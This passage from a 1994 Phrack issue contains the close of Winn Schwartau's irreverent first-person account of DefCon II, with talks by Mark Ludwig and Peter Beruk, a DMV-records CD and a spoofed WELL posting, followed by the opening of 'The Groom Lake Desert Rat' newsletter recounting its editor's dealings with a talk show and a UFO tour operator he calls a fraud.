convicted methamphetamine dealer doing at DefCon II with hundreds
of impressionable teenagers? You might well ask.
So I'll tell you.
Sitting in yet another Saharan hell-hole of a room they unabash
edly market for $55 per night I encountered hackers #1 through #4
and this . . . I immediately thought, elderly gent. He said
nothing and neither did I, thinking that he might have been an
over aged chaperone for delinquent teens or perhaps even an
understanding Fed. But the gallon jugs of whiskey was depleting
itself right before my eyes, as if a straw from Heaven sucked the
manna from its innards. Actually, it was Bootleg.
Not bootleg liquor, mind you, but Bootleg the felonious con from
Oregon. Apparently he got busted 'cause speed is and was against
the law, and crank is not exactly the drug choice of maiden aunts
nor school marms. "I've been a hacker longer than some of these
kids have been alive. It all started back in . . ." and Mike
"Bootleg" Beketic commenced on the first of hundreds of war-story
jail house tales to entertain him and us. Bootleg loves a good
story.
"Jail ain't so bad," he bragged with a huge whiskey smile. "No
one fucked with me. You gotta make friends early on. Then it's
OK." Good advice, I guess. "On parole I got slammed with a year
for piss that didn't pass." Gotta be clean, my man. Stay away
from that shit. It'll kill you and your teeth will rot.
Bootleg handed me form PROB-37, (Rev. 1/94) from the United
States District Court, Federal Probation System. Grins from ear
to ear. A badge of honor for villains, thieves, and scoundrels.
Sounds like they need their own union.
This was the official "Permission To Travel" form dated June 16,
1994 which gave Bootleg the legal right to travel from Oregon to
Las Vegas in the dead of the summer to attend a "computer conven
tion." The flight times were specific as were the conditions of
his freedom. He had to inform the local cops that he was in
town. In case any crimes occurred throughout the city of Las
Vegas during his sojourn, he was an easily identifiable suspect.
While he downed another Jack and coke I found out what Bootleg
was really doing. Despite the fact that the "Federal Keep Track
of a Crook Travel Form" said, "you are prohibited from advertis
ing or selling your DMV CD," the paranoia that runs rampant
through the minds of prison bureaucracy was actually in this case
quite correctly concerned.
"What's a DMV CD?"
"I'm glad you asked." I was set up. The edict said he couldn't
sell or advertise, but there was no provision stating that he
couldn't answer questions from an inquiring mind.
Bootleg handed me a CD ROM:
Bootleg Presents:
DMV
- Over 2 Million Oregon Drivers License Records
- Over 3 Million Oregon License Plate Records
The inside jacket clearly stated that this information was not to
be used by any creatively nefarious types for any sort of person
al Information Warfare tactics. It warns,
Do not use this CD to:
- Make phony Licenses
- Make phony Titles
- Obtain phony I.D.
- Harass Politicians, Cops or Journalists
- Stalk Celebrities
- Get ME in trouble <G>
I can come up with at least 1001 other uses for this collection
of information that the Oregon authorities are none too happy
about. The ones Bootleg outlined never came into my mind.
(Heh!) Bootleg acquired the information legally. State officials
were kind enough to violate the electronic souls of its citizens
by sending Bootleg their driver's information magnetically embla
zoned on a 3600 foot long piece of 9 track acetate. Now they
want to change the law to reflect "heart felt concern for the
privacy of their citizens." Get a clue, or if none's available,
buy one from Vanna.
Bootleg is moving onto the next 47 states (California and New
York don't permit this kind of shenanigans) shortly to make sure
that everyone has equal access. Hacking? Of course. Bootleg
effectively hacked the Oregon DMV with their blessing and tax
payer paid-for assistance.
Time to go back to my room while Bootleg and friends spent an
evening of apparently unsuccessful whoring around the Strip and
Glitter Gulch.
A good time was had by all.
* * * * *
Jeff Moss opened the Sunday morning session with an ominous
sermon.
"You'll notice that the wet bar is missing from the rear?" It
had been there yesterday. Everyone turns around to look. "I
gotta pay for the damage . . . " Jeff was not a happy camper.
"They have my credit card number and it's almost full. So cool
it!" But the show must go on and we had more to learn.
Next. Anonymous mailers on the net? Forget about it. No such
thing. Anonymous remailers, even if they are in Norway or Finland
or some such other country where American information contraband
such as child pornography is legal, are only as safe and secure
as the people who run it
"The FBI can go over any time they want and look up who you are
and what kinds of stuff you swallow down your digital throat,"
one speaker announced. Of course that's ridiculous. The FBI
would have to call in the Boy Scouts or Russian Mafia for that
kind of operation, but we all knew that anyway. A slight slip of
the ad lib tongue. No harm done.
I didn't know, until this Sunday, that there were actually real
live versions of "Pump Up The Volume" running rampant across the
country, impinging their commercial-free low power radio broad
casts into an electromagnetic spectrum owned and operated by the
Federal Communications Commission. And, as to be expected, the
FCC is trying to put these relatively harmless stations out of
business along with Howard Stern and Don Imus. One would think
that WABC or KLAC or any other major market stations would little
care if a podunk 20 watt radio station was squeezing in between
assigned frequencies. And they probably shouldn't. But, as we
learned, the Military lent an innocent hand.
In support of the hobbies of servicemen, a local San Francisco
base commander gave approval for a group of soldiers to establish
a small, low power radio station for the base. Good for morale,
keep the men out of the bars: you know the bit.
But the ballistic missiles went off when the nation's premier
rating service, Arbitron, listed KFREE as a top local station in
the San Francisco market.
"What station KFREE?" "Who the hell are they?" "What the fuck?"
Needless to say, KFREE was costing the legitimate radio stations
money because advertising rates are based upon the number of
listeners not up and peeing during commercials. Since KFREE was
ad-free, no contest. Arbitron assumes the rating to relect the
existence of a real station - the numbers are there - and the
local stations call the FCC and the FCC calls the base and as
quick as you can scream, "Feds suck!" KFREE is off the air.
Stomp.
I was scheduled to speak today, but with the schedule seemingly
slipping forward and backward at random haphazard intervals,
there was no telling when what would occur. Mark Ludwig, of
Virus Writing Contest fame and author of the much touted "Little
Black Book of Computer Viruses" Virus gave a less then impas
sioned speech about the evils of government.
"I know most of you don't have any assets other than your comput
er," Ludwig said to the poverty stricken masses of DefCon II.
"But you will, and you want to make sure the government doesn't
come crashing down around you whenever they want. They can and
will take your life away if it suits them. There is no fourth
amendment. Most search and seizures are illegal." And so it
went.
"Put your money off shore, kids," said Dr. Ludwig the theoretical
physicist. "Find a good friendly country with flexible banking
laws and the Feds can't get you."
"And when the Feds do come for you, make sure that your entire
life is on your computer. Rip up the papers after you scan them
in. Your all-electronic life cannot be penetrated - especially
if you get a case of the forgets. 'Oops, I forgot my password.
Oops! I forgot my encryption key. Oops! I forgot my name.'"
"Even your VISA and Mastercard accounts should be from overseas.
Keep it out of the US and you'll be all the better for it." For
those interested in such alternative, Ludwig recommends that you
call Mark Nestman: of LPP Ltd. at 800-528-0559 or 702-885-2509.
Tell him you want to move your millions of rubbles and dollars
and Cyber-credits overseas for safe keeping because the Byzantine
Police are at the front door as you speak. Order pamphlet 103.
These are the defensive measures we can take protect ourselves
against the emerging Police State. But offensive action is also
called for, he says. "Help Phil Zimmerman. Send him money for
his defense. Then, laugh at the Feds!" Haha, haha. Haha.
Hahahahahaha. Ha!
."When they come to the door, just laugh at them." Haha. Haha
ha. Haha. "No matter what they do, laugh at them." Hahahahaha.
Enough of that, please. If I laugh at 6 husky beer-bellied
Cyber-cops who have an arsenal of handguns pointed at my head,
they might as well send me to the Group W bench to commiserate
with Arlo Guthrie. Peeing would come before laughing. But then
again, I'm no longer a grunged out 20 year old who can laugh in
the face of the Grim Reaper. "Yes, ossifer, sir. I'm a cyber-
crook. I ain't laughing at you in your face, ossifer, sir . . ."
I panic easily. Kissing ass well comes from a life long success
of quid pro quo'ing my way from situation to situation.
"And, now," Master Mark announced, "on to the results and awards
for the Annual Virus Writing contest." Ludwig seemed suddenly
depressed. "Unfortunately, we only got one legitimate entry."
One entry? The media plastered his contest across the media-
waves and the National Computer Security Association was planning
a tactical nuclear response. One entry? What kind of subver
sives have 20 year olds turned into anyway? In my day (Yeah, I'm
old enough to use that phrase) if we called for a political
demonstration thousands would pile through the subway turnstiles
to meet a phalanx of well armed police appropriately attired in
riot gear. One entry? Come on X-Generation, you can do better
than that? No wonder the world's going to shit. Don't have
enough trouble from the young-uns. Sheeeeeeesssh!
Mark Ludwig's politically incorrect virus writing contest may
have been a PR success but it was a business abortion. One
entry. Shit. At the NCSA meeting in Washington, rivaling fac
tions battled over how we as an association should respond.
"Hang the bastard." "He's what's wrong with world." "Put him in
a county jail with Billy-Bob, Jimmy-Ray and Bubba for a week and
they'll be able to squeeze him out between the bars."
C'mon you fools! Ignore him! Ignore him! If you don't like what
he has to say don't egg him on. Ignore him. You want to do what
the Feds did to poor Phil Zimmerman and make him a folk hero?
Turning a non-event into the lead for the evening news is not the
way to make something go away. I loudly advocated that he be
treated as a non-entity if the goal was reduction to obscurity.
I was right.
Super-high priced PR and lobby firms had prepared presentation to
wage an all-out attack on Ludwig and his contest. I bet! And who
was going to pay for this? Peter Tippitt of Semantech ponied up
what I believe amounted to $7,000 to get the pot going. No one
else made a firm offer. Can't blame them cause it would have been
no more effective than taking out an ad in Time proclaiming that
evil is bad. The PR firm would have made their fees, the event
would have made even more news and Ludwig would certainly have
had to make a judgement and choose from more than one entry.
But oddly enough, the one entry did not win.
The winner of the Annual Virus Writing Contest was no less than
Bob Bales, Executive Director of the NCSA. Not that Bob wrote a
program, but if he had, Ludwig said, it would be called either
Don Quixote or Paranoia, and it would be of the human brain at-
tacking Meme type. The virus is a software equivalent of Prozac
to alleviate the suffering in middle-aged males who have no
purpose in life other than virus busting.
"Is Winn Schwartau here?" Mark asked the audience.
I was there. "Yo!"
"Would you tell Bob that he's won a plaque, and a $100 check and
a full year subscription to the Computer Virus Developments
Quarterly." I'm the technology advisor to the NCSA so it was
a natural request to which I was pleased to oblige.
I told Bob about his 15 minutes of fame at DefCon to which he
roared in laughter. "Good! Then I won't have to subscribe my
self."
I spoke next. Jeff introduced me by saying, "Winn says he
doesn't want to speak to an empty room so he's gonna talk now."
Some introduction. But, what a great audience! Better than most
of the security above-ground starched sphincter tight suit and
tie conference audiences I normally get. But then again, I get
paid handsomely to address legitimate audiences where I have to
be politically correct. At DefCon, insulting people was the last
thing I worried about. It was what I focused on, onstage and
off.
"Hey, kid. Did you ever land Zimmerman in bed?"
"You, you, er . . ."
"C'mon kid. Give me your best shot."
"Your mother . . ." A crowd gathered to see what kind of repar
tee this little schnook could come up with. "Your mother .. ."
C'mon kid. You got it in you. C'mon. "You, she is a . . .
uh, . . . mother . . ." and he finally skulked away in sheer
embarrassment. Poor kid. When he went to the men's room, men
walked out. Poor kid. I don't think he ever figured out it was
all a put on.
The audience got it, though. Rather than go over what I rambled
about for an hour, here comes a blatant plug: Go buy my new book
"Information Warfare: Chaos on the Electronic Superhighway."
That'll sum it up real nice and neat. But what a great audience.
Thanks.
Little did I know, though, that I was also on trial.
John Markoff of the New York Times was the first to ask, and then
a couple of buddies asked and then a lady asked during the Q&A
portion of my ad hoc ad lib speech. "How come you did it?" Did
what? "How come you flamed Lenny DeCicco?"
It turns out that someone adapted my electronic identity and
logged on to the WELL in Sausalito, CA and proceeded to post a
deep flame against Lenny. Among other none-too-subtle asper
sions, 'my' posting accused Lenny of a whole string of crimes of
Information Warfare and even out and out theft.
Except, it wasn't me. I answered the lady's question with, "It
wasn't me, I don't know Lenny and I don't have an account on the
WELL." That satisfied everyone except for me. What happened
and why? It seems that Lenny's former partner in crime Most-
Wanted on the lam federal fugitive computer hacker Kevin Mitnick
actually wrote and signed the letter with his initials. Or
someone was spoofing him and me at the same time. But why? And
why me?
It took a couple of days after arriving home from DefCon to learn
after extensive conversations with the WELL that my erased ac
count from almost two years ago and then re-erased on June 20 of
this year was accidentally turned back on by some mysterious
administrative process that I cannot claim to fathom. OK, that's
what they said.
But perhaps most interesting of the entire Getting Spoofed inci
dent was a single comment that Pei Chen, sysop of the WELL said
to me while I complained about how such an awful anti-social
attack was clearly reprehensible. Oh, it's simple, she said.
"We have no security." Whooaaaahhh! The WELL? No security? I
love it. I absolutely love it. Major service provider, no
security. Go get 'em cowboy.
The only other speaker I wanted to see was Peter Beruk, chief
litigator for the Software Publisher's Association. This is the
Big Software Company sponsored organization which attempts to
privately interdict illegal software distribution as a prelude
for both civil and criminal prosecutions. And with this group of
digital anarchists, no less.
The SPA scrounges around 1600 private BBS's to see who's making
illicit copies of Microsoft Word or Quattro For Weanies or
Bulgarian for Bimbos or other legitimate software that the pub
lishers would rather receive their due income from then being
stolen.
"Which boards are you on?"
"That would be telling." Big grin and laughs.
"Is your BBS secure?" A challenge in the making.
"Sure is."
"Is that an offer to see if we can break in?" Challenge made.
"Ahem, cough, cough." Challenge denied.
"What name do you use on the boards?" Idiot question that de
serves an idiot answer.
"Fred." Laughs.
"You mean you have a full time guy to download software from
boards to see if it's legal or not?" "Yup."
"So, you pay people to commit felonies?" Astutely stupid ques
tion.
"We have permission."
"Why should we have to pay rip-off corporations too much money to
use really shitty software?"
"So don't buy it."
"We don't. It's so shitty that it's barely worth stealing."
"So don't steal it."
"Just want to check it out, dude."
"Scum sucking imperialists are making all of the money. The
software designers are getting ripped off by the big software
bureaucracies. Power to the people." Every generation goes
through this naively innocent berating of capitalism. It doesn't
make them Communists (in 1950 it did), just not full fledged
capitalist pigs themselves yet. Soon come. Vis a vis Ludwig's
comment on the asset-deprived audience. Soon come, man.
"We go after BBS's that store illegal software."
"So you're gonna put Compuserve in jail?" Big, big applause.
Despite the openly verbal animosity between the free-ware believ
ers and the Chief Software Cop, the spirited and entertaining
disagreements maintained a healthy good natured tone that well
exceed Peter's time limit, as DefCon II was coming to a close.
It was time for one more stand up comedy attempt by a short haired
bandanna wearing hippie/hacker/phreak who was not quite up to the
job.
"OK, guys. We've had some fun at the Feds expense. They're
people, too. So, from now on, it's Hug a Fed. Go on, find a fed
and go up to him or her and big them a great big bear hug full of
love." The Feds that had been busted were gone. The ones still
successfully undercover weren't about to blow it for a quick feel
from a horny teenager.
Next. The Cliff Stoll doll with an assortment of accessory yo-
yos was a popular item. It was thrown pell-mell into the crowds
who leapt at it with a vengeance like a baseball bleachers sec
tion awaiting the 61st home run.
"There used to be a Wife of Cliff Stoll doll, but no one's seen
it in two years." Cliff is strange. I don't know if he's that
strange, but it was a funny bit.
"Then we have the LoD/MoD action figure set starring Erik Bloo
daxe and Phiber Optik." GI Joe action set gone underground.
Corny, but appreciated as hundreds of bodies dove to catch the
plastic relics tossed from the stage.
If anything, an anti-climatic end to an otherwise highly informa
tive and educational conference. I can hardly wait till next
year when, after word gets out, DefCon III will be attended by
thousands of hackers and cops and narks who will try to replay
the Summer of Cyber-Love '94 for a sequel.
* * * * *
More than anything I wanted to get away from the Sahara. Away
from its nauseatingly chromatic carpets, it's hundreds of sur
veillance cameras, and most of all, away from its exploding
toilets.
We decided to play, and play we did at the new Luxor Hotel which
is an amazing pyramid with 4000+ rooms. There are no elevators as
in a pyramid 'going up' is kind of useless, so Inclinators take
passengers up the 30 some odd floors to hallways which ring
around the impossibly huge hollowed out pyramid shaped atrium.
This was play land. And for three hours we played and played and
went to dumb shows that attract mid-western mamas from Noodnick,
Kentucky, alighting in Vegas for their annual RV pilgrimage. But
we went and enjoyed none the less.
The "Live TV" show was anything but live except for lovely Susan
who hosted us into the ersatz TV station. Her job is to look
pretty, sound pretty and warm up the crowd for an over budget,
overproduced schmaltz driven video projection that was to make us
all feel like we were on stage with Dave. Letterman, that is.
The effect does not work. But we enjoyed ourselves, anyway.
"Everyone here on vacation?"
"No!" I yelled out. Poor Susan was stunned. No? Why else would
you be here?
"What are you doing?" The TV audience of 500 was looking our
way. Between the five of us we had a million dollars (give or
take) of electronic wizardry stuffed around us, beneath us and in
our laps.
"Working." Gee, I'm quick.
"What do you do?" Susan asked with a straight face. I bet she
expected something like gas pumper, or nocturnal mortuary forni
cator or 7/11 clerk.
"We're hacking for Jesus. This is Cyber Christ!" I said pointing
at Erik Bloodaxe.
Silence. Dead silence again. Sleep with Phil Zimmerman silence.
Except for us. We giggled like school boys. Psyche.
"Ah, . . . that's nice." That was all she could come up with:
That's nice. So much for ad libbing or deviating from the
script. But the TV audience enjoyed it. A whole lot. They
finally figured out it was put on. Not every one from the Mid-
West is as stupid as they all pretend to be.
Then it was time to get sick. VR rides do me in, but not to be
publicly humiliated by my 20-something cohorts (and Mike Peros
with whom I had to travel yet another 2000 miles that night) I
jumped right into an F-14 simulator which rotated 360 degrees on
two gimbals for an infinite variety of nauseousness.
"Oh, shit!" I yelled as I propelled myself forward and around and
sideways with sufficient g-force to disgorge even the most delec
table meal. "Oh, shit." I had reversed the throttle and was now
spinning end over end backwards. My inner ear was getting my
stomach sick. "Oh, shit." Out of the corner of my eyes my four
pals were doubled over in laughter. Had I barfed yet and not
known it? God, I hope not. "Oh, shit." I came to a dead stand
still, the video screen showed me plummeting to earth at escape
velocity and I pushed the throttle forward as roughly as I could.
An innate survival instinct came in to play. "Oh, shit!" The
virtual aircraft carrier came into sight and after almost 2
minutes of high speed rotating revulsion, I was expected to land
this spinning F-14 on a thimble in the ocean. Right. I tried,
and damned if I didn't make it. I have no idea how, but I got an
extra 34,000 points for a safe landing. 120 seconds. Ding.
Time's up.
I got out of the simulator and spilled right onto the floor; one
42 year old pile of humanity who had navigated nausea but whose
balance was totally beyond repair. "Could anyone hear me?" I
asked from my knees.
"They were selling tickets."
"Do I get my money back?"
Onto the VR race cars. I really thought I'd throw up to the
amusement of a thousand onlookers. Hacking then phreaking then
flying and now driving. I put the pedal to the metal and
crashed. The huge video display has me tipping end over end and
the screen is shaking and the car I'm driving is shuddering
violently but my brain can't compute it all. I'm gonna wretch, I
just know it. But I keep on driving, decidedly last against
people who haven't been handicapped with an inner ear so sensi
tive I get dizzy when I watch a 5" black and white TV.
We tilted out of there and alas, it was time to find a 200,000
pound of metal to glide me home. It was a damn good thing I hadn't
eaten before VR Land, but I wolfed down $3 hot dogs at the air
port knowing full well that whatever they served on the plane
would be a thousand times worse. So Mike and I munched, leaving
Cyber Christ and friends to battle the press and the stars at the
opening of Planet Hollywood at Caesar's Palace.
And then an unexpected surprise. Lisa and friend; our first class
objects of flirtation from the outbound trip which seemed like a
month ago, appeared. But we were all so wiped out that a conti
nent of innuendo turned into a series of short cat naps. We got
a few flirts in, but nothing to write home about. Red Eye
flights are just not what they're cracked up to be.
As I crawled into bed at something like 7AM Eastern, my wife
awoke enough to ask the perennial wife question. "What did you
do all weekend?" I, in turn, gave her the usual husbandly re
sponse.
"Oh, nothing. Good night, Gracie."
* * * * *
(C) 1994 Winn Schwartau
Winn Schwartau is an information security consultant, lecturer
and, obviously, a writer. Please go buy his new book: "Informa
tion Warfare: Chaos on the Electronic Superhighway." Available at
book stores everywhere. Winn can be reached at: Voice:
813.393.6600 or E-mail: P00506@Psilink.com
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 21 of 28
****************************************************************************
[Several of us had plans to tempt fate and join the other pop-culture
lemmings running off to Area 51 during Defcon. The not-so-secret
base has seen more press this year than Madonna. Armed with
our ICOM 2SRAs and a copy of "The Area 51 Viewer's Guide"
we planned to put our lives on the line purely for the sake of
being able to say "We were there!"
The night before we were planning on going, FOX-TV broadcast
an episode of "Encounters" that focused heavily on Area 51.
The thought of tromping off on our little recon adventure
accompanied by winnebago-loads of families taking the kids
to see "that dang UFO place from the TV," just sorta ruined
the mood.
Hopefully, this won't happen to you. And if you do go,
you really should consider getting the "viewer's guide"
from Glenn Campbell (psychospy@aol.com). Email him for
a catalog of Area 51 stuff.
Glenn also publishes an electronic mag documenting recent activities
surrounding Area 51, and related activities. With his permission,
Phrack is extremely please to bring you the latest issue of
"The Groom Lake Desert Rat."
-----------------------------------------------------------------------------
THE GROOM LAKE DESERT RAT. An On-Line Newsletter.
Issue #15. Sept. 2, 1994.
-----> "The Naked Truth from Open Sources." <-----
AREA 51/NELLIS RANGE/TTR/NTS/S-4?/WEIRD STUFF/DESERT LORE
Written, published, copyrighted and totally disavowed by
psychospy@aol.com. See bottom for subscription/copyright info.
In this issue...
SUBTLETIES OF THE TELEVISION TALK SHOW, PART I
NEW AIR FORCE STATEMENT ON GROOM
EG&G TO ABANDON TEST SITE
JANET "N" NUMBERS
JANET HANDOFF FREQUENCIES
GROOMSTOCK '94
SOUND FAMILIAR?
CAMPBELL ARRAIGNED
LARRY KING NOT CLONED?
MYSTERIOUS SIGN DISAPPEARANCE
INTEL BITTIES
[Note: This file ends with "###".]
----- MEDIA COMMUNICATIONS 103A -----
SUBTLETIES OF THE TELEVISION TALK SHOW, PART I
In DR #10, we reviewed the major news media--print, radio and
television--and showed how each could twist reality in their own
special way. Strictly for the sake of science, Psychospy allowed
himself to be turned into a minor media celebrity so we could
report to our readers the sometimes dubious processes behind the
scenes. There was a limit, however, to how low we would sink in
the pursuit of knowledge. We would not take off our clothes for
the camera, and we would not place ourselves in any situation
where our credibility, reputation or dignity could be seriously
trashed.
Now we can report that this barrier has been broken. In the next
two issues of the Rat we will recount our first-hand experiences
with the lowest form of mass media, the television talk show.
..... THE MEDIUM OF TALK .....
Talk shows come in three basic formats. The rarest but most
respectable is the SERIOUS ISSUES talk show exemplified by "Meet
the Press," "Nightline" and the roundtable discussions on PBS--
maybe even "Larry King Live." They are dignified and serious,
explore meaningful political and societal issues, and hardly
anyone watches them.
The next rung down the ladder--vapid but benign--is the CELEBRITY
CHAT talk show, like the "The Tonight Show," "Late Show with David
Letterman" and "Arsenio Hall." Movie stars and Big Money authors
pump their latest work in a non-confrontational environment
designed only to promote laughs.
The last and lowest form of the genre is the HUMAN CONFLICT talk
show. These syndicated programs always bear the name of the host,
like "Oprah," "Geraldo," "Vicky" or "Leeza." He or she is a
charismatic and camera-loving character, no doubt ruthless in real
life, but blessed with the ability to convey warmth and sincerity
on TV. The fodder for these shows is a steady diet of human
suffering, crises, angst and tragedy. Former spouses and
estranged friends face off against each other; grown men and women
reveal to the parents their until-now-hidden perversities, and
human oddities of all shapes and sizes present themselves for
humiliation before a nationwide audience. The ultimate goal of
these shows is the public expression of private feelings. They
seek tears, anger, jealousy and graphic self-immolation recorded
by the camera on a tight close-up. With a dozen such shows now in
syndication, the competition is intense to seek out new forms of
conflict and expose the latest narcissistic trends.
Talk shows are produced "live on tape" with minimal editing, and
this presents special problems for a guest. In other forms of
television, sound bites rule the show. It may seem artificial,
but tight editing at least assures that each party has their say
and only their finest bon mot will be used. The courteous speaker
with a few good ideas can confidently compete with any
extravagant, microphone-hogging blowhard, because most of what the
blowhard says will be cut. In the almost-live talk show, the more
reasonable speaker has to compete with the blowhard head on.
There is no time for an orderly presentation of evidence; he who
makes the most outrageous, confident and colorful claims,
groundless or not, gains the camera's eye and controls the game.
If you have any shred of personal dignity and are asked to be a
guest on a Human Conflict show, the best response is obvious:
"Just Say No." Unless you are a masochist or a natural born
actor, there is no way you can win in this format. We know it
now; we knew it then, but sometimes, like Oedipus, you just can't
stop the inevitable march of Fate....
..... ONWARD TO HUMILIATION .....
The path to our own downfall was indirect. For several months, a
number of journalists have been making the pilgrimage to Freedom
Ridge, and we generally escort them as a sort of local public
relations representative. We do not charge for this service, and
we do not discriminate between journalists. If TASS or Penthouse
or the Podunk Review came to call, we would treat them no
differently than the New York Times.
In May, we got a call from a producer from the Montel Williams
Show, one of the Human Conflict shows that we had never seen. It
seems that "Montel," as he is known to the world, had promised on
an earlier talk show that he would visit the border of Area 51.
We told the producer that we would be willing to escort Montel and
his crew to Freedom Ridge to tape a segment, but we declined an
offer to come to New York to appear on the studio show. Montel's
visit was originally scheduled for May 5 but was canceled at the
last minute, and we breathed a sign of relief.
In August, the project was reactivated, we suspect as the result
of the June 22 article in the New York Times. Montel's visit was
scheduled for Aug. 16, and we were again asked if we would go to
New York to appear on the later show. Again, we declined.
When Montel came to Rachel, he brought a Humvee, his producers and
a film crew. We went through the usual script for the camera:
Montel drives up to our Research Center, and we meet him in the
driveway. Inside, we show him where we are going on the map, then
we get in the car and drive the rugged road to Freedom Ridge. We
had done it before with countless crews, but never so quickly and
in so few "takes." When Montel arrived, there was no question
that he was in charge. He asked no significant questions, and
showed no particular interest in the secret base itself. We
sensed that he came only because he said he would and that his
primary aim was to film a sound bite on the ridge that said, "You
see, I did what I promised."
As we rode down from Freedom Ridge in the Humvee with Montel and
the producer, we were again asked if we would come to New York to
appear on the talk show the following week, Aug. 23. We hesitated
and were about to turn down the offer cold, when the producer
uttered the only horrible words that could force us to comply.
Sean David Morton.
..... THE EMBODIMENT OF EVIL .....
We first learned of Sean Morton over two years ago, before we came
to Rachel. We had heard his enthusiastic endorsement of the Black
Mailbox on a UFO video:
"Probably the most amazing thing about Area 51 is the fact that
this is literally the only place in the world where you can go out
and actually see flying saucers on a timetable basis. You can
literally go out there on a Wednesday night between about seven
and one a.m. and you'll see these things flying up and down the
valley. It's absolutely amazing. On even a bad night you'll have
ten, eleven, twelve sightings. On a good night--and I've been out
there with friends of mine camping--on a good night the sky will
just rip open with these things. You'll see anywhere between
twenty to forty objects in a night testing over the base for
anywhere from fifteen and forty minutes at a time."
We've lived near the border for over a year and a half now, are
genuinely interested in UFOs and have spent countless days and
nights in the desert; yet we haven't seen even ONE flying saucer,
let alone scores. The logical explanation is that we arrived too
late, after the saucers had been packed up and moved elsewhere.
The trouble with this theory is that during the early part of our
tenure, Sean Morton continued to bring tours to the area--at $99 a
head--and reported UFOs everywhere.
In one celebrated incident in March 1993, Psychospy spent the
night on White Sides, overlooking Groom Lake, with some aviation
watchers and a writer from Popular Science. We were looking for
the alleged Aurora spyplane--almost as ephemeral as flying
saucers--but we saw nothing more than a few satellites, some
distant aircraft strobes and an occasional meteor. The following
was reported in the March 1994 Popular Science....
"Last March, three chilly airplane watchers with binoculars
atop White Sides Mountain at this magic hour [4:45am] were
tracking a 737 airliner approaching Groom Lake, as a fourth member
of their group thawed out in his truck below. Parked on a knoll,
he was next to a vanload of UFO seekers. They were lead by tour
operator Sean Morton, whose leaflet described him as 'the world's
foremost UFO researcher.'
"Morton donned a horned Viking helmet and from time to time
pointed to the sky, exclaiming: 'Look at that one!' The airplane
watcher trained his binoculars in the same direction but saw
nothing out of the ordinary. Later, Morton's group became excited
by what they perceived as an entire formation of UFOs; the
airplane watcher's lenses revealed only stars. Finally, as the
morning's first 737 made its gentle approach toward Groom Lake at
4:45, the UFO enthusiasts rejoiced at Old Faithful's appearance.
Everyone had seen exactly what they hoped for."
In the beginning, when we were new to the area, we were generous
to Sean and called him "fantasy prone." As we got to know him
better and gained confidence in our own knowledge base, we came to
mince no words. Sean is a deliberate con man. He recognizes as
well as us the landing lights of a 737, but he knows that others
can be fooled and taken for a $99 ride to see them. If anyone is
spreading disinformation about Area 51, filling the air with noise
to make the truth harder to grasp, it isn't sinister government
agents; it's Sean David Morton pursuing only his own greed and
self-aggrandizement.
We have worked hard over the past 18 months to undo the damage
Sean has done and displace him from the Area 51 scene.
Discrediting Sean isn't complicated: We simply quote his own
words whenever we can. Sean is a broadly diversified charlatan, a
self-proclaimed expert in faith healing, earthquake prediction,
psychic prophesy and virtually every other New Age fad. We have
no problem at all with him plying his trade within the confines of
the state of California where he justly belongs, but when he
proclaims himself the foremost authority on Area 51, we get
territorial. We hope that our "Area 51 Viewers Guide" has reduced
the gullibility of newcomers and made the environment less
attractive for leeches like him. In fact, we haven't had a
confirmed Morton sighting near the border in over a year. We
heard from sources in California that he no longer gave tours to
Area 51 because the saucers had been moved elsewhere--which was
fine by us.
The saucers must have returned, however. As the recent Groom Lake
publicity reached its peak, "The World's Foremost UFO Researcher"
could not help but resurface to suck energy from it. In recent
months, reports began to reach us that he had appeared as an Area
51 expert at UFO conferences, on radio talk shows and on the
Montel Williams Show.
In the latter appearance, which was first broadcast in December
1993, Sean showed video footage of nighttime "UFOs" that he said
he photographed "at great risk to my own life." As we viewed them
later, one clip showed an isolated circle of light jumping around
within the frame. It could have been any stationary out-of-focus
light shot through a hand-held video camera. Notches seen on the
top and bottom of the "disk" correspond to protrusions inside the
lens assembly. In the other clip, only slightly out of focus, we
saw the lights of a 737 landing on the Groom Lake airstrip. To
Sean, it was "an object actually coming in from space." The time
stamp in the corner said "4:49 am."
It was on this show that Montel promised to visit Area 51 escorted
by Sean; yet when Montel finally made the trip eight months later,
Sean was not invited. The producer told us that word had reached
him from many sources that Sean was considered a fraud, that in
addition to UFOs he also did psychic prophesies and that his
claimed credentials were highly dubious. He and Montel felt that
Sean had taken advantage of them and that by having him on the
show they had inadvertently legitimized him.
But none of that prevented them from inviting him back as a guest
the second studio show.
As we rode down in the Humvee from Freedom Ridge with Montel and
the producer, the reality to us became crystal clear: If we did
not appear on the Montel Williams Show, then Sean would have the
stage all to himself and could continue to spread any sort of
nonsense about Area 51. We felt that we had no choice. Either we
did battle with this guy now, before he grew bigger, or we would
be cleaning up his mess for many months to come.
..... OUR RAPID EDUCATION .....
We had less than a week to prepare for the big show--nowhere near
enough time to do all the research we needed. The first item of
business was to actually watch the Montel Williams Show and
familiarize ourselves with the format. We cranked up our
satellite dish and surfed through the channels. On "Donahue":
"Six Year Olds Who Sexually Harass Other Six Year Olds." On
"Rolanda, a related topic: "Will Your Child Grow Up To Be A
Serial Killer?" On "The Vicky Show," we heard that Sean Morton
had just appeared as an expert on the prophesies of Nostradamus,
but we were unable to catch that one.
The first Montel Williams Show we saw was, "Mistresses Who Want To
End The Affair." On the stage, three women disguised by dark
sunglasses explained why they had been attracted to married men.
We could only tolerate about ten seconds at a time of this show,
but when we tuned back, we found that the women had shed their
sunglasses and revealed their true identities. Presumably, they
had also revealed, or at least seriously compromised, the
identities of the men they had been having the affairs with. When
we tuned in again later, one of the three was having an angry
argument with a fourth female guest. We guessed that this was the
wife of one of the married men.
A friend sent us a tape of Montel's original UFO show in which
Sean appeared as a "UFO Investigator" and Montel promised to
visit. The show included an abductee, a witness to the "Kecksburg
Incident," a former actress, WFUFOR Sean David Morton, a requisite
skeptic, a pro-UFO filmmaker and--as if you hadn't guessed--that
talk show regular Travis Walton. The show was conducted in the
"expanding chairs" format. It started out with two guests alone
on the stage, then more guests and chairs were added during each
commercial break until there were seven chairs and seven
squabbling speakers vying for attention on the platform. In this
format, attention is diluted with each new chair, so the people
who appear last, typically the skeptics, usually get only a few
seconds of airtime. During the free-for-all of a seven-person
debate, the camera always focuses on the most aggressive and
charismatic guest--i.e. Sean David Morton.
The last chair to be filled was occupied by filmmaker Russ Estes,
who the on-screen caption said, "Does Not Believe In UFOs." This
is false. He is a disciplined UFO investigator who has devoted
his career to making films on the subject, as well as exposing
obvious frauds. What is true is that he "Does Not Believe In Sean
Morton." In his few seconds of air time, he raised doubts about
one of Morton's many fake credentials, his claimed "Doctor of
Divinity" degree.
